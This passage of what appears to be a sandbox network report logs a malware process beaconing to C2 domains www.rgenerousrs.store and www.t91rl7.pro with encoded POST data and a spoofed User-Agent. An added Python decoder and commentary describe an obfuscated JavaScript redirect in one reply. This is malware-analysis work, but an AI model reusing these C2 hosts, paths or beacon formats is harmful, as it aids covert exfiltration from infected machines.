                                                                Session ID: 21 | Source IP: 192.168.2.6 | Source Port: 50010 | Destination IP: 172.67.167.146 | Destination Port: 80 | PID: 4872 | Process: C:\Program Files (x86)\pQqiQLYjrBijlMQVckrQuteZaQpNVCZKtyWmIetDvHVFtJDxKxLQlCnMfdg\QvLFrfAuvuCLc.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Nov 27, 2024 08:55:38.984736919 CET | 770 | OUT | POST /o362/ HTTP/1.1
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US
                                                                Host: www.rgenerousrs.store
                                                                Origin: http://www.rgenerousrs.store
                                                                Referer: http://www.rgenerousrs.store/o362/
                                                                Cache-Control: no-cache
                                                                Content-Length: 208
                                                                Connection: close
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                Data Raw: 36 64 72 3d 49 59 6c 6f 75 59 72 49 30 79 51 6c 31 55 68 6a 62 68 72 57 67 39 41 34 58 57 34 61 44 41 62 58 74 63 71 51 5a 32 63 44 62 33 70 41 76 76 5a 68 32 2f 72 54 39 2b 57 61 53 58 4a 75 38 48 30 38 6e 46 68 30 5a 43 7a 68 32 4d 5a 71 34 34 67 2b 73 4d 48 76 41 33 6d 33 37 6a 2b 4f 41 77 52 69 47 68 6b 59 33 4f 72 46 66 7a 55 6d 72 55 4b 66 61 6c 44 63 36 44 4f 6c 56 55 65 67 39 63 46 42 6c 4f 6b 58 34 66 77 32 78 6f 36 41 56 43 61 4e 5a 52 6f 43 4d 43 5a 35 61 4a 58 71 6d 67 48 4e 6d 71 74 55 62 6a 6a 6c 30 52 7a 54 78 65 34 32 2b 50 5a 6c 6b 34 33 56 4c 33 44 49 61 46 45 73 2f 63 76 31 6c 57 35 39 52 65 36 42
                                                                Data Ascii: 6dr=IYlouYrI0yQl1UhjbhrWg9A4XW4aDAbXtcqQZ2cDb3pAvvZh2/rT9+WaSXJu8H08nFh0ZCzh2MZq44g+sMHvA3m37j+OAwRiGhkY3OrFfzUmrUKfalDc6DOlVUeg9cFBlOkX4fw2xo6AVCaNZRoCMCZ5aJXqmgHNmqtUbjjl0RzTxe42+PZlk43VL3DIaFEs/cv1lW59Re6B
                                                                Nov 27, 2024 08:55:40.463380098 CET | 1070 | IN | HTTP/1.1 404 Not Found
                                                                Date: Wed, 27 Nov 2024 07:55:40 GMT
                                                                Content-Type: text/html; charset=iso-8859-1
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                Vary: Accept-Encoding
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lFckI5tGqzTEcjNp4DuYGxsjwG0Nn7U0zbtwrU3rw9xBXIOnEoqMJaGdQsg6sJjMOny38I0pt5EHzqKx1ILVgzfUbYAjCwvKZrFu5QJ6qbyqkaVxhWMd0LwzhXoTO9WZSw9wagab%2Bgs%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8e908ea6df277274-EWR
                                                                Content-Encoding: gzip
                                                                alt-svc: h3=":443"; ma=86400
                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1858&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=770&delivery_rate=0&cwnd=179&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                Data Raw: 65 35 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f c1 4e c3 30 10 44 ef fe 8a a5 27 38 e0 4d ab 54 e2 b0 b2 44 9b 54 54 0a 25 02 e7 c0 d1 d4 0b 8e 54 e2 60 3b 04 fe 1e 25 15 52 af 33 6f 46 33 74 55 3c 6d f5 6b 5d c2 83 7e ac a0 6e 36 d5 7e 0b 8b 5b c4 7d a9 77 88 85 2e ce ce 4a 66 88 e5 61 a1 04 b9 f4 79 52 e4 d8 58 25 28 b5 e9 c4 2a cf 72 38 f8 04 3b 3f 74 96 f0 2c 0a c2 19 a2 37 6f 7f a7 dc 52 5d 30 6e a9 04 f5 4a 3b 86 c0 5f 03 c7 c4 16 9a e7 0a 46 13 a1 f3 09 de 27 0e 7c 07 c9 b5 11 22 87 6f 0e 92 b0 9f 9a 82 12 64 ac 0d 1c a3 ba ef cd d1 31 ae 64 2e d7 6b b8 6e ba f6 e7 06 5e 66 1c 4c 82 71 1c 65 f8 e0 8e 83 1f 62 88 32 26 1f 18 6a 1f 12 dc 65 84 ff 2d 82 70 9e 49 38 df fb 03 00 00 ff ff 0d 0a 62 0d 0a e3 02 00 db 2a cd 17 19 01 00 00 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: (gzip-compressed body, split across two chunks of 0xe5 and 0xb bytes; not printable as text, see Data Raw)


                                                                Session ID: 22 | Source IP: 192.168.2.6 | Source Port: 50011 | Destination IP: 172.67.167.146 | Destination Port: 80 | PID: 4872 | Process: C:\Program Files (x86)\pQqiQLYjrBijlMQVckrQuteZaQpNVCZKtyWmIetDvHVFtJDxKxLQlCnMfdg\QvLFrfAuvuCLc.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Nov 27, 2024 08:55:41.763883114 CET | 794 | OUT | POST /o362/ HTTP/1.1
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US
                                                                Host: www.rgenerousrs.store
                                                                Origin: http://www.rgenerousrs.store
                                                                Referer: http://www.rgenerousrs.store/o362/
                                                                Cache-Control: no-cache
                                                                Content-Length: 232
                                                                Connection: close
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                Data Raw: 36 64 72 3d 49 59 6c 6f 75 59 72 49 30 79 51 6c 7a 31 52 6a 5a 47 48 57 73 4e 41 35 64 32 34 61 4a 67 61 63 74 63 6d 51 5a 30 77 54 59 42 35 41 76 4c 4a 68 31 36 48 54 2b 2b 57 61 5a 33 4a 52 7a 6e 31 52 6e 46 73 4a 5a 48 54 68 32 4d 6c 71 34 34 77 2b 74 2f 76 73 44 48 6d 35 77 44 2b 4d 4f 51 52 69 47 68 6b 59 33 4f 50 38 66 33 34 6d 72 6b 61 66 62 41 76 62 33 6a 4f 69 57 55 65 67 71 4d 46 46 6c 4f 6b 6c 34 64 46 54 78 75 2b 41 56 47 4b 4e 59 41 6f 42 47 43 5a 7a 58 70 57 75 6c 54 44 48 75 49 59 6c 62 43 66 5a 75 7a 37 73 35 49 6c 73 69 38 5a 47 32 6f 58 58 4c 31 62 36 61 6c 45 47 39 63 58 31 33 42 31 61 65 71 66 69 31 37 70 44 32 4d 36 75 75 62 77 64 6f 4d 64 46 78 7a 71 38 38 51 3d 3d
                                                                Data Ascii: 6dr=IYlouYrI0yQlz1RjZGHWsNA5d24aJgactcmQZ0wTYB5AvLJh16HT++WaZ3JRzn1RnFsJZHTh2Mlq44w+t/vsDHm5wD+MOQRiGhkY3OP8f34mrkafbAvb3jOiWUegqMFFlOkl4dFTxu+AVGKNYAoBGCZzXpWulTDHuIYlbCfZuz7s5Ilsi8ZG2oXXL1b6alEG9cX13B1aeqfi17pD2M6uubwdoMdFxzq88Q==
                                                                Nov 27, 2024 08:55:43.124485016 CET | 1067 | IN | HTTP/1.1 404 Not Found
                                                                Date: Wed, 27 Nov 2024 07:55:42 GMT
                                                                Content-Type: text/html; charset=iso-8859-1
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                Vary: Accept-Encoding
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=U8WNQR3%2BwwbqUhFmGLUzNgU4Uyt8FoIi12qxV2pbYo7stPG2n4dU%2FMWmtJdUAyDAfL4sjQrukZnX2ZevQT1zFBrCJGO3ieQJWs4K7Q6WN677aPk1jpMZtHghZG5Kyk00obES5m7suPQ%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8e908eb75b394289-EWR
                                                                Content-Encoding: gzip
                                                                alt-svc: h3=":443"; ma=86400
                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1631&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=794&delivery_rate=0&cwnd=143&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                Data Raw: 66 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f c1 4e c3 30 10 44 ef fe 8a a5 27 38 e0 4d ab 54 e2 b0 b2 44 9b 54 54 0a 25 02 e7 c0 d1 d4 0b 8e 54 e2 60 3b 04 fe 1e 25 15 52 af 33 6f 46 33 74 55 3c 6d f5 6b 5d c2 83 7e ac a0 6e 36 d5 7e 0b 8b 5b c4 7d a9 77 88 85 2e ce ce 4a 66 88 e5 61 a1 04 b9 f4 79 52 e4 d8 58 25 28 b5 e9 c4 2a cf 72 38 f8 04 3b 3f 74 96 f0 2c 0a c2 19 a2 37 6f 7f a7 dc 52 5d 30 6e a9 04 f5 4a 3b 86 c0 5f 03 c7 c4 16 9a e7 0a 46 13 a1 f3 09 de 27 0e 7c 07 c9 b5 11 22 87 6f 0e 92 b0 9f 9a 82 12 64 ac 0d 1c a3 ba ef cd d1 31 ae 64 2e d7 6b b8 6e ba f6 e7 06 5e 66 1c 4c 82 71 1c 65 f8 e0 8e 83 1f 62 88 32 26 1f 18 6a 1f 12 dc 65 84 ff 2d 82 70 9e 49 38 df fb 03 00 00 ff ff e3 02 00 db 2a cd 17 19 01 00 00 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: (gzip-compressed body in a single 0xf0-byte chunk; not printable as text, see Data Raw)


                                                                Session ID: 23 | Source IP: 192.168.2.6 | Source Port: 50012 | Destination IP: 172.67.167.146 | Destination Port: 80 | PID: 4872 | Process: C:\Program Files (x86)\pQqiQLYjrBijlMQVckrQuteZaQpNVCZKtyWmIetDvHVFtJDxKxLQlCnMfdg\QvLFrfAuvuCLc.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Nov 27, 2024 08:55:44.569236040 CET | 1807 | OUT | POST /o362/ HTTP/1.1
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US
                                                                Host: www.rgenerousrs.store
                                                                Origin: http://www.rgenerousrs.store
                                                                Referer: http://www.rgenerousrs.store/o362/
                                                                Cache-Control: no-cache
                                                                Content-Length: 1244
                                                                Connection: close
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                Data Raw: 36 64 72 3d 49 59 6c 6f 75 59 72 49 30 79 51 6c 7a 31 52 6a 5a 47 48 57 73 4e 41 35 64 32 34 61 4a 67 61 63 74 63 6d 51 5a 30 77 54 59 42 78 41 76 38 68 68 32 5a 66 54 2f 2b 57 61 48 48 4a 55 7a 6e 31 70 6e 46 30 4e 5a 48 58 78 32 4b 68 71 34 65 38 2b 71 4f 76 73 59 33 6d 35 2f 6a 2b 42 41 77 51 34 47 68 30 44 33 4f 66 38 66 33 34 6d 72 69 57 66 50 6c 44 62 6b 54 4f 6c 56 55 66 76 39 63 46 74 6c 4f 74 53 34 64 41 6d 32 65 65 41 4d 6d 61 4e 56 53 77 42 4b 43 5a 31 5a 4a 57 49 6c 55 4b 64 75 4d 34 2b 62 43 37 7a 75 7a 50 73 70 50 59 61 6c 4d 49 52 73 71 54 4c 53 48 54 4f 63 54 73 68 35 4f 6e 53 32 77 6f 75 51 37 76 62 30 2b 78 56 39 4d 6e 70 34 64 46 30 6a 34 30 55 77 33 7a 33 67 71 4a 37 57 4b 52 34 36 44 4c 48 4e 69 66 66 6c 54 4a 2b 4d 2b 53 38 59 6a 67 36 59 61 30 4b 59 69 72 4c 53 54 4f 30 65 49 67 41 6a 66 59 43 34 42 79 6a 49 2b 79 53 71 2b 73 77 62 34 43 79 62 50 75 6d 72 48 41 4b 31 55 45 71 59 74 79 48 4a 63 75 51 65 33 72 53 71 49 2b 6d 6f 45 53 6d 79 64 37 6a 4e 71 42 43 55 61 57 6a 74 55 [TRUNCATED]
                                                                Data Ascii: 6dr=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 [TRUNCATED]
                                                                Nov 27, 2024 08:55:45.943701982 CET | 1071 | IN | HTTP/1.1 404 Not Found
                                                                Date: Wed, 27 Nov 2024 07:55:45 GMT
                                                                Content-Type: text/html; charset=iso-8859-1
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                Vary: Accept-Encoding
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=x5X6PjxzMUJt4eqCGYvH08I7r%2BKLtvAX5O9eFP3RqTB4jjjSp56Ddplakrz1PNhssEzG9f21vfgIbuIVmGd6c38DFGJnatYTmQNkrvU2dbhRbeOMqBxnEPhPhLp5WTdEE1EGzw0GfIs%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8e908ec93be4429a-EWR
                                                                Content-Encoding: gzip
                                                                alt-svc: h3=":443"; ma=86400
                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1733&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1807&delivery_rate=0&cwnd=235&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                Data Raw: 65 35 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f c1 4e c3 30 10 44 ef fe 8a a5 27 38 e0 4d ab 54 e2 b0 b2 44 9b 54 54 0a 25 02 e7 c0 d1 d4 0b 8e 54 e2 60 3b 04 fe 1e 25 15 52 af 33 6f 46 33 74 55 3c 6d f5 6b 5d c2 83 7e ac a0 6e 36 d5 7e 0b 8b 5b c4 7d a9 77 88 85 2e ce ce 4a 66 88 e5 61 a1 04 b9 f4 79 52 e4 d8 58 25 28 b5 e9 c4 2a cf 72 38 f8 04 3b 3f 74 96 f0 2c 0a c2 19 a2 37 6f 7f a7 dc 52 5d 30 6e a9 04 f5 4a 3b 86 c0 5f 03 c7 c4 16 9a e7 0a 46 13 a1 f3 09 de 27 0e 7c 07 c9 b5 11 22 87 6f 0e 92 b0 9f 9a 82 12 64 ac 0d 1c a3 ba ef cd d1 31 ae 64 2e d7 6b b8 6e ba f6 e7 06 5e 66 1c 4c 82 71 1c 65 f8 e0 8e 83 1f 62 88 32 26 1f 18 6a 1f 12 dc 65 84 ff 2d 82 70 9e 49 38 df fb 03 00 00 ff ff 0d 0a 62 0d 0a e3 02 00 db 2a cd 17 19 01 00 00 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: (gzip-compressed body, split across two chunks of 0xe5 and 0xb bytes; not printable as text, see Data Raw)


                                                                Session ID: 24 | Source IP: 192.168.2.6 | Source Port: 50013 | Destination IP: 172.67.167.146 | Destination Port: 80 | PID: 4872 | Process: C:\Program Files (x86)\pQqiQLYjrBijlMQVckrQuteZaQpNVCZKtyWmIetDvHVFtJDxKxLQlCnMfdg\QvLFrfAuvuCLc.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Nov 27, 2024 08:55:47.230771065 CET | 503 | OUT | GET /o362/?Kp=6N8LUn6pGPW&6dr=FaNItuPk5TcZ9HdRFxGis99OVV5mBzvNwqypTl8+VCtQ49ZNgIXGwO2PY0xc/TpBxHoMd3n/rLst/5dAk+rqA0qO3SSFE3YHITh7+9T1aVwk8yasaXm8yz75cRrj4u8mi8kZiIg= HTTP/1.1
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Language: en-US
                                                                Host: www.rgenerousrs.store
                                                                Connection: close
                                                                User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                Nov 27, 2024 08:55:48.702327013 CET | 1085 | IN | HTTP/1.1 404 Not Found
                                                                Date: Wed, 27 Nov 2024 07:55:48 GMT
                                                                Content-Type: text/html; charset=iso-8859-1
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                Vary: Accept-Encoding
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DrufJxLZ%2FVgL2esuhAHwZAkRphuH7iAbvctJyiKbcKPThg1c5pKFM8UUoOi8GocHXSzM22PQKXzPBXQF7gHGonW6k7Nem%2BRhmjbYU3AVuDp3FBqv1QGELYhZPXYdZitU6E2YrluqH3I%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8e908eda7ca54339-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2149&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=503&delivery_rate=0&cwnd=222&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                Data Raw: 31 31 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 35 20 28 55 6e 69 78 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 72 67 65 6e 65 72 6f 75 73 72 73 2e 73 74 6f 72 65 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 119<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.55 (Unix) Server at www.rgenerousrs.store Port 80</address></body></html>0


                                                                Session ID: 25 | Source IP: 192.168.2.6 | Source Port: 50014 | Destination IP: 154.88.22.101 | Destination Port: 80 | PID: 4872 | Process: C:\Program Files (x86)\pQqiQLYjrBijlMQVckrQuteZaQpNVCZKtyWmIetDvHVFtJDxKxLQlCnMfdg\QvLFrfAuvuCLc.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Nov 27, 2024 08:55:54.296211958 CET | 749 | OUT | POST /jhb8/ HTTP/1.1
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US
                                                                Host: www.t91rl7.pro
                                                                Origin: http://www.t91rl7.pro
                                                                Referer: http://www.t91rl7.pro/jhb8/
                                                                Cache-Control: no-cache
                                                                Content-Length: 208
                                                                Connection: close
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                Data Raw: 36 64 72 3d 35 54 66 56 39 67 71 61 42 6c 6b 4c 6f 47 59 41 6e 45 4c 46 45 6f 67 30 64 6b 55 2f 76 2f 63 55 42 79 39 4b 77 57 64 2b 57 30 32 45 79 31 57 58 30 53 66 6b 48 5a 76 32 4f 41 57 31 75 2f 78 51 78 56 57 2b 66 76 66 79 2b 75 41 5a 57 33 6b 57 6a 65 72 59 30 4a 30 69 31 42 6d 69 63 74 46 55 58 69 6d 4a 79 31 31 65 59 46 4b 6a 71 78 52 6e 39 35 77 50 74 63 62 59 5a 74 4e 39 68 6b 49 73 6d 50 69 75 49 59 2f 63 65 6a 61 72 76 75 56 68 6c 37 53 32 46 45 4a 53 50 2f 6c 4d 54 51 43 2f 54 6e 44 39 31 79 6c 33 42 43 61 69 71 56 49 7a 6a 66 53 51 59 68 48 38 32 67 69 77 35 6e 41 57 61 32 50 37 76 6c 61 79 55 7a 4b 36
                                                                Data Ascii: 6dr=5TfV9gqaBlkLoGYAnELFEog0dkU/v/cUBy9KwWd+W02Ey1WX0SfkHZv2OAW1u/xQxVW+fvfy+uAZW3kWjerY0J0i1BmictFUXimJy11eYFKjqxRn95wPtcbYZtN9hkIsmPiuIY/cejarvuVhl7S2FEJSP/lMTQC/TnD91yl3BCaiqVIzjfSQYhH82giw5nAWa2P7vlayUzK6
                                                                Nov 27, 2024 08:55:55.855292082 CET | 364 | IN | HTTP/1.1 200 OK
                                                                Server: nginx
                                                                Date: Wed, 27 Nov 2024 07:55:55 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                Vary: Accept-Encoding
                                                                Strict-Transport-Security: max-age=31536000
                                                                Content-Encoding: gzip
                                                                Data Raw: 36 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 29 4e 2e ca 2c 28 b1 cb c9 4f 4e 2c c9 cc cf 8b 56 cf 50 d7 56 2f 4a 05 12 69 ea b1 0a b6 0a 89 25 f9 49 1a ea 89 1e 41 06 c9 1e be 66 3e 95 16 55 be ee 81 15 3e 79 81 a6 be 21 6e 65 51 ce a6 e5 c9 b9 16 66 fe 2e d9 15 be 81 b6 b6 ea 9a 36 fa 50 13 01 ca 47 04 94 5a 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: (gzip-compressed body in a single 0x67-byte chunk; not printable as text, see Data Raw)
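The 404 bodies from www.rgenerousrs.store (sessions 21 to 23) and the 200 OK bodies from www.t91rl7.pro (sessions 25 and 26) are gzip-compressed inside chunked framing, so the report's Data Ascii column shows nothing readable for them. The Python below is an added example, not part of the Joe Sandbox report: it dechunks and gunzips the Data Raw hex (function names are mine; the three hex dumps are copied verbatim from sessions 20, 21 and 25). Decoding shows that the Cloudflare-fronted 404 is the same 281-byte Apache error page that session 24 received in plaintext, with the gzip member split across two chunks (0xe5 and 0xb bytes) in session 21 and arriving as one 0xf0-byte chunk in session 22, so per-chunk decompression would fail. The 200 OK from www.t91rl7.pro decompresses to a 90-byte page beginning `<script>location['h'+'re'+'f'] = atob('aHR0`, a JavaScript redirect that builds the property name "href" by string concatenation and base64-encodes the target URL ("aHR0" decodes to "http").

```python
"""Dechunk and gunzip HTTP response bodies given as "Data Raw" hex dumps.
Added example, not Joe Sandbox code. The dumps below are copied from
sessions 20, 21 and 25 of the report."""
import gzip


def dechunk(body: bytes) -> bytes:
    """Reassemble a Transfer-Encoding: chunked body into the original octets.

    Each chunk is "<hex size>[;ext]" CRLF <data> CRLF; a zero-size chunk ends
    the body. Chunk boundaries mean nothing to the payload, so a single gzip
    member may span several chunks (session 21 above does exactly that).
    """
    out = bytearray()
    pos = 0
    while True:
        eol = body.index(b"\r\n", pos)
        size = int(body[pos:eol].split(b";", 1)[0], 16)  # drop chunk extensions
        pos = eol + 2
        if size == 0:
            return bytes(out)  # trailer fields, if any, are not needed here
        out += body[pos:pos + size]
        pos += size
        if body[pos:pos + 2] != b"\r\n":
            raise ValueError("chunk data not terminated by CRLF")
        pos += 2


def decode_body(hex_dump: str, content_encoding: str = "") -> bytes:
    """Turn a Data Raw hex dump into the plaintext body the client saw."""
    payload = dechunk(bytes.fromhex(hex_dump))
    if content_encoding.lower() == "gzip":
        # gzip.decompress verifies the CRC32/ISIZE trailer, so a mistyped
        # dump raises instead of silently yielding garbage.
        payload = gzip.decompress(payload)
    return payload


# Session 20, www.vayui.top: no Content-Encoding, one 0x92-byte chunk.
NGINX_404_PLAIN = (
    "39 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 "
    "20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 "
    "65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e "
    "74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d "
    "0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a"
)

# Session 21, www.rgenerousrs.store: Content-Encoding: gzip, chunks 0xe5 and 0xb.
APACHE_404_GZIP = (
    "65 35 0d 0a "
    "1f 8b 08 00 00 00 00 00 00 03 4c 8f c1 4e c3 30 10 44 ef fe 8a a5 27 38 e0 4d ab 54 e2 b0 "
    "b2 44 9b 54 54 0a 25 02 e7 c0 d1 d4 0b 8e 54 e2 60 3b 04 fe 1e 25 15 52 af 33 6f 46 33 74 "
    "55 3c 6d f5 6b 5d c2 83 7e ac a0 6e 36 d5 7e 0b 8b 5b c4 7d a9 77 88 85 2e ce ce 4a 66 88 "
    "e5 61 a1 04 b9 f4 79 52 e4 d8 58 25 28 b5 e9 c4 2a cf 72 38 f8 04 3b 3f 74 96 f0 2c 0a c2 "
    "19 a2 37 6f 7f a7 dc 52 5d 30 6e a9 04 f5 4a 3b 86 c0 5f 03 c7 c4 16 9a e7 0a 46 13 a1 f3 "
    "09 de 27 0e 7c 07 c9 b5 11 22 87 6f 0e 92 b0 9f 9a 82 12 64 ac 0d 1c a3 ba ef cd d1 31 ae "
    "64 2e d7 6b b8 6e ba f6 e7 06 5e 66 1c 4c 82 71 1c 65 f8 e0 8e 83 1f 62 88 32 26 1f 18 6a "
    "1f 12 dc 65 84 ff 2d 82 70 9e 49 38 df fb 03 00 00 ff ff "
    "0d 0a 62 0d 0a e3 02 00 db 2a cd 17 19 01 00 00 0d 0a 30 0d 0a 0d 0a"
)

# Session 25, www.t91rl7.pro: Content-Encoding: gzip, one 0x67-byte chunk.
C2_200_OK_GZIP = (
    "36 37 0d 0a "
    "1f 8b 08 00 00 00 00 00 00 03 b3 29 4e 2e ca 2c 28 b1 cb c9 4f 4e 2c c9 cc cf 8b 56 cf 50 "
    "d7 56 2f 4a 05 12 69 ea b1 0a b6 0a 89 25 f9 49 1a ea 89 1e 41 06 c9 1e be 66 3e 95 16 55 "
    "be ee 81 15 3e 79 81 a6 be 21 6e 65 51 ce a6 e5 c9 b9 16 66 fe 2e d9 15 be 81 b6 b6 ea 9a "
    "36 fa 50 13 01 ca 47 04 94 5a 00 00 00 "
    "0d 0a 30 0d 0a 0d 0a"
)

if __name__ == "__main__":
    for name, dump, enc in (("nginx 404", NGINX_404_PLAIN, ""),
                            ("apache 404", APACHE_404_GZIP, "gzip"),
                            ("t91rl7 200", C2_200_OK_GZIP, "gzip")):
        body = decode_body(dump, enc)
        print(f"{name}: {len(body)} bytes, starts {body[:48]!r}")
```

The dechunker deliberately tolerates chunk extensions and stops at the zero-size chunk without parsing trailers, which is all that is needed for captured bodies; for a live proxy you would also enforce a maximum reassembled size before decompressing.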


                                                                Session ID: 26 | Source IP: 192.168.2.6 | Source Port: 50015 | Destination IP: 154.88.22.101 | Destination Port: 80 | PID: 4872 | Process: C:\Program Files (x86)\pQqiQLYjrBijlMQVckrQuteZaQpNVCZKtyWmIetDvHVFtJDxKxLQlCnMfdg\QvLFrfAuvuCLc.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Nov 27, 2024 08:55:56.956094027 CET | 773 | OUT | POST /jhb8/ HTTP/1.1
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US
                                                                Host: www.t91rl7.pro
                                                                Origin: http://www.t91rl7.pro
                                                                Referer: http://www.t91rl7.pro/jhb8/
                                                                Cache-Control: no-cache
                                                                Content-Length: 232
                                                                Connection: close
